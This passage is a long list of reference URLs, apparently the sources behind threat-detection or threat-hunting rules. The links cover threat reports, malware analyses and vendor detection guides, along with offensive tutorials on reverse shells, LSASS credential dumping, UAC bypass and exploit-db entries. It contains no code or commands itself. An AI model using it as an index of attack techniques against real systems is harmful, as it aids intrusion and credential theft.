uberturve/tale_of_gamaredon_infection.pdf\nhttps://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe\nhttps://web.archive.org/web/20220419045003/https://cyberwardog.blogspot.com/2017/04/chronicles-of-threat-hunter-hunting-for.html\nhttps://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver\nhttps://web.archive.org/web/20220422215221/https://twitter.co
m/malware_traffic/status/1517622327000846338\nhttps://web.archive.org/web/20220514073704/https://github.com/ch2sh/Jlaive\nhttps://web.archive.org/web/20220519091349/https://fatrodzianko.com/2020/02/15/dll-side-loading-appverif-exe/\nhttps://web.archive.org/web/20220614030603/http://www.powertheshell.com/ntfsstreams/\nhttps://web.archive.org/web/20220815065318/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html\nhttps://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html\nhttps://web.archive.org/web/20220830134315/https://content.fireeye.com/apt-41/rpt-apt41/\nhttps://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/\nhttps://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008\nhttps://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html\nhttps://web.archive.org/web/20230217071802/https://blooteem.com/march-2022\nhttps://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html\nhttps://web.archive.org/web/20230329155141/https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html\nhttps://web.archive.org/web/20230329170326/https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html\nhttps://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html\nhttps://web.archive.org/web/20230329172447/https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html\nhttps://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html\nhttps://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf\nhttps://web.archive.org/web/20230726144748/https://blog.thickmints.dev/min
tsights/detecting-rogue-rdp/\nhttps://web.archive.org/web/20231210115125/http://www.xuetr.com/\nhttps://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/\nhttps://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/\nhttps://wikileaks.org/vault7/#Pandemic\nhttps://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/\nhttps://winaero.com/enable-openssh-server-windows-10/\nhttps://winaero.com/how-to-delete-scan-with-windows-defender-from-context-menu-in-windows-10/\nhttps://windows-internals.com/faxing-your-way-to-system/\nhttps://windows-internals.com/printdemon-cve-2020-1048/\nhttps://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/\nhttps://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/\nhttps://www-fsb-ru.translate.goog/fsb/press/message/single.htm!id=10439739@fsbMessage.html?_x_tr_sch=http&_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=de&_x_tr_pto=wapp\nhttps://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf\nhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nhttps://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity\nhttps://www.acronis.com/en-us/blog/posts/lockbit-ransomware/\nhttps://www.action1.com/documentation/\nhttps://www.activecyber.us/activelabs/windows-uac-bypass\nhttps://www.acunetix.com/blog/articles/exploiting-sql-injection-example/\nhttps://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/\nhttps://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/\nhttps://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/\nhttps://www.advanced-ip-scanner.com/\nhttps://www.advanced-port-scanner.com/\nhttps://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent\nhttps://www.agnosticdev.com/content/how-diagnose-app
-transport-security-issues-using-nscurl-and-openssl\nhttps://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats\nhttps://www.ammyy.com/en/admin_features.html\nhttps://www.ampliasecurity.com/research/windows-credentials-editor/\nhttps://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations\nhttps://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies\nhttps://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat\nhttps://www.anquanke.com/post/id/226029\nhttps://www.anyviewer.com/help/remote-technical-support.html\nhttps://www.arxiv-vanity.com/papers/2008.04676/\nhttps://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966\nhttps://www.atomicredteam.io/atomic-red-team/atomics/T1048.003#atomic-test-8---python3-httpserver\nhttps://www.atomicredteam.io/atomic-red-team/atomics/T156001#atomic-test-46---aws---guardduty-suspension-or-deletion\nhttps://www.atomicredteam.io/atomic-red-team/atomics/T1562.002#atomic-test-8---modify-event-log-channel-access-permissions-via-registry---powershell\nhttps://www.atomicredteam.io/atomic-red-team/atomics/T1562.012\nhttps://www.autohotkey.com/download/\nhttps://www.autoitscript.com/site/\nhttps://www.beyondtrust.com/blog/entry/okta-support-unit-breach\nhttps://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon\nhttps://www.binarydefense.com/resources/blog/icedid-gziploader-analysis/\nhttps://www.bitdefender.com/en-us/blog/businessinsights/bitdefender-advisory-critical-unauthenticated-rce-windows-server-update-services-cve-2025-59287\nhttps://www.bitdefender.com/en-us/blog/businessinsights/shrinklocker-decryptor-from-friend-to-foe-and-back-again\nhttps://www.bitdefender.com/files/News/CaseStudies/study/262/Bi
tdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf\nhttps://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf\nhttps://www.blackhat.com/docs/asia-14/materials/Erickson/Asia-14-Erickson-Persist-It-Using-And-Abusing-Microsofts-Fix-It-Patches.pdf\nhttps://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf\nhttps://www.blackhillsinfosec.com/mitm6-strikes-again-the-dark-side-of-ipv6/\nhttps://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/\nhttps://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/\nhttps://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/\nhttps://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/\nhttps://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/\nhttps://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/\nhttps://www.bleepingcomputer.com/news/security/anydesk-says-hackers-breached-its-production-servers-reset-passwords/\nhttps://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/\nhttps://www.bleepingcomputer.com/news/security/fortinet-says-ssl-vpn-pre-auth-rce-bug-is-exploited-in-attacks/\nhttps://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/\nhttps://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/\nhttps://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/\nhttps://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/\nhttps://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/\nht
tps://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/\nhttps://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/\nhttps://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/\nhttps://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/\nhttps://www.bleepingcomputer.com/news/security/new-moveit-transfer-zero-day-mass-exploited-in-data-theft-attacks/\nhttps://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly\nhttps://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/\nhttps://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/\nhttps://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html\nhttps://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\nhttps://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents\nhttps://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html\nhttps://www.blumira.com/cve-2023-2283/\nhttps://www.cadosecurity.com/blog/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence\nhttps://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/\nhttps://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/\nhttps://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/\nhttps://www.chrisfarris.com/post/effective-aws-ransomware/\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\nht
tps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a\nhttps://www.cisa.gov/sites/default/files/2024-04/aa24-109a-stopransomware-akira-ransomware_2.pdf\nhttps://www.cisa.gov/uscert/ncas/alerts/aa20-259a\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-321a\nhttps://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf\nhttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/15-sy/config-mgmt-15-sy-book/cm-config-diff.html\nhttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-a1-cr-book_chapter_0111.html\nhttps://www.cisco.com/c/en/us/td/docs/ios/12_2sr/12_2sra/feature/guide/srmgtint.html#wp1127609\nhttps://www.cisco.com/c/en/us/td/docs/server_nw_virtual/2-5_release/command_reference/show.html\nhttps://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/command/reference/sysmgmt/n5k-sysmgmt-cr/n5k-sm_cmds_c.html\nhttps://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/show_startup-config.htm\nhttps://www.cisco.com/en/US/docs/ios/security/command/reference/sec_a2.pdf\nhttps://www.cisecurity.org/controls/cis-controls-list/\nhttps://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf\nhttps://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf\nhttps://www.cloud-architekt.net/auditing-of-msi-and-service-principals/\nhttps://www.cloudcoffee.ch/microsoft-365/configure-windows-laps-in-microsoft-intune/\nhttps://www.cobaltstrike.com/blog/why-is-notepad-exe-connecting-to-the-internet\nhttps://www.cobaltstrike.com/help-opsec\nhttps://www.cobaltstrike.com/help-windows-executable\nhttps://www.computerhope.com/unix/unohup.htm\nhttps://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/\nhttps://www.connectwise.com/company/trust/security-bulletins/connectw
ise-screenconnect-23.9.8\nhttps://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/\nhttps://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/\nhttps://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/\nhttps://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/\nhttps://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/\nhttps://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/\nhttps://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/\nhttps://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/\nhttps://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/\nhttps://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/\nhttps://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\nhttps://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/\nhttps://www.crowdstrike.com/blog/windows-restart-manager-part-1/\nhttps://www.crowdstrike.com/blog/windows-restart-manager-part-2/\nhttps://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/\nhttps://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update\nhttps://www.cve.org/CVERecord?id=CVE-2024-1708\nhttps://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/\nhttps://www.cyberbit.com/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/\nhttps://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware\nhttps://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\nhttps://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles\nhttps://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targ
ets-global-aerospace-and-telecoms-firms\nhttps://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code\nhttps://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\nhttps://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\nhttps://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/\nhttps://www.d7xtech.com/free-software/runx/\nhttps://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon\nhttps://www.datadoghq.com/blog/monitor-kubernetes-audit-logs/#monitor-api-authentication-issues\nhttps://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/\nhttps://www.deepinstinct.com/blog/nofilter-abusing-windows-filtering-platform-for-privilege-escalation\nhttps://www.dfirnotes.net/portproxy_detection/\nhttps://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html\nhttps://www.echotrail.io/insights/search/defaultpack.exe\nhttps://www.echotrail.io/insights/search/ilasm.exe\nhttps://www.echotrail.io/insights/search/msbuild.exe\nhttps://www.echotrail.io/insights/search/mshta.exe\nhttps://www.echotrail.io/insights/search/regsvr32.exe\nhttps://www.echotrail.io/insights/search/wermgr.exe\nhttps://www.echotrail.io/insights/search/wusa.exe/\nhttps://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\nhttps://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign\nhttps://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation\nhttps://www.elastic.co/guide/en/security/7.17/prebuilt-rule-0-16-1-scheduled-task-execution-at-scale-via-gpo.html\nhttps://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html\nhttps://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html\nhttps://www.elastic.co/guide/en/security/current/exec
ution-of-com-object-via-xwizard.html\nhttps://www.elastic.co/guide/en/security/current/group-policy-abuse-for-privilege-addition.html#_setup_275\nhttps://www.elastic.co/guide/en/security/current/kubernetes-container-created-with-excessive-linux-capabilities.html\nhttps://www.elastic.co/guide/en/security/current/kubernetes-pod-created-with-hostnetwork.html\nhttps://www.elastic.co/guide/en/security/current/kubernetes-suspicious-self-subject-review.html\nhttps://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html\nhttps://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html\nhttps://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html\nhttps://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script\nhttps://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html\nhttps://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html\nhttps://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html\nhttps://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html\nhttps://www.elastic.co/guide/en/security/current/startup-logon-script-added-to-group-policy-object.html\nhttps://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html\nhttps://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html\nhttps://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack\nhttps://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns-exe.html\nhttps://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html\nhttps://www.elastic.co/guide/en/security/current/unusual-parent-proce
ss-for-cmd.exe.html\nhttps://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html\nhttps://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html\nhttps://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html\nhttps://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html\nhttps://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html\nhttps://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\nhttps://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set\nhttps://www.elastic.co/security-labs/grimresource\nhttps://www.elastic.co/security-labs/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion\nhttps://www.elastic.co/security-labs/operation-bleeding-bear\nhttps://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks\nhttps://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2\nhttps://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua\nhttps://www.epicturla.com/blog/sysinturla\nhttps://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html\nhttps://www.exploit-db.com/exploits/19525\nhttps://www.exploit-db.com/exploits/37525\nhttps://www.exploit-db.com/exploits/39161\nhttps://www.exploit-db.com/exploits/47297\nhttps://www.exploit-db.com/exploits/47696\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html\nhttps://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html\nhttps://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html\nhttps://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-pe
rsistence.html\nhttps://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html\nhttps://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html\nhttps://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html\nhttps://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html\nhttps://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html\nhttps://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html\nhttps://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html\nhttps://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html\nhttps://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\nhttps://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html\nhttps://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html\nhttps://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html\nhttps://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html\nhttps://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf\nhttps://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf\nhttps://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf\nhttps://www.first.org/resources/papers/conf2017/Advanced-Incident-Detect
ion-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf\nhttps://www.forensafe.com/blogs/runmrukey.html\nhttps://www.fortiguard.com/threat-signal-report/4718?s=09\nhttps://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign\nhttps://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document\nhttps://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\nhttps://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing\nhttps://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods\nhttps://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html\nhttps://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf\nhttps://www.fortypoundhead.com/showcontent.asp?artid=24022\nhttps://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/\nhttps://www.giac.org/paper/gcih/266/review-ftp-protocol-cyber-defense-initiative/102802\nhttps://www.glitch-cat.com/p/green-lambert-and-attack\nhttps://www.gnu.org/software/wget/manual/wget.html\nhttps://www.google.com/search?q=%22reg.exe+save%22+sam\nhttps://www.google.com/search?q=procdump+lsass\nhttps://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw\nhttps://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/\nhttps://www.gov.pl/attachment/ee91f24d-3e67-436d-aa50-7fa56acf789d\nhttps://www.gpg4win.de/documentation.html\nhttps://www.gradenegger.eu/en/details-of-the-event-with-id-53-of-the-source-microsoft-windows-certificationauthority/\nhttps://www.group-ib.com/blog/hunting-for-ttps-with-prefetch-files/\nhttps://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-da
y-tren-microsoft-exchange-server-12714.html\nhttps://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/\nhttps://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/\nhttps://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics\nhttps://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/\nhttps://www.hackingarticles.in/rdp-session-hijacking-with-tscon/\nhttps://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/\nhttps://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/\nhttps://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf\nhttps://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/\nhttps://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling\nhttps://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats\nhttps://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass\nhttps://www.huntress.com/blog/attacking-mssql-servers\nhttps://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment\nhttps://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software\nhttps://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\nhttps://www.huntress.com/blog/the-unwanted-guest\nhttps://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild\nhttps://www.hvs-consulting.de/lazarus-report/\nhttps://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100\nhttps://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100\nhttps://www.hybrid-analys
is.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100\nhttps://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100\nhttps://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100\nhttps://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100\nhttps://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1\nhttps://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100\nhttps://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100\nhttps://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100\nhttps://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100\nhttps://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120\nhttps://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100\nhttps://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100\nhttps://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100\nhttps://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100\nhttps://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100\nhttps://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100\nhttps://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12
748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100\nhttps://www.hybrid-analysis.com/sample/ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8?environmentId=110\nhttps://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1\nhttps://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns\nhttps://www.ietf.org/rfc/rfc2821.txt\nhttps://www.infosecademy.com/netcat-reverse-shells/\nhttps://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz\nhttps://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject\nhttps://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/\nhttps://www.intrinsec.com/akira_ransomware/\nhttps://www.intrinsec.com/apt27-analysis/\nhttps://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html\nhttps://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html\nhttps://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges\nhttps://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone\nhttps://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo\nhttps://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-p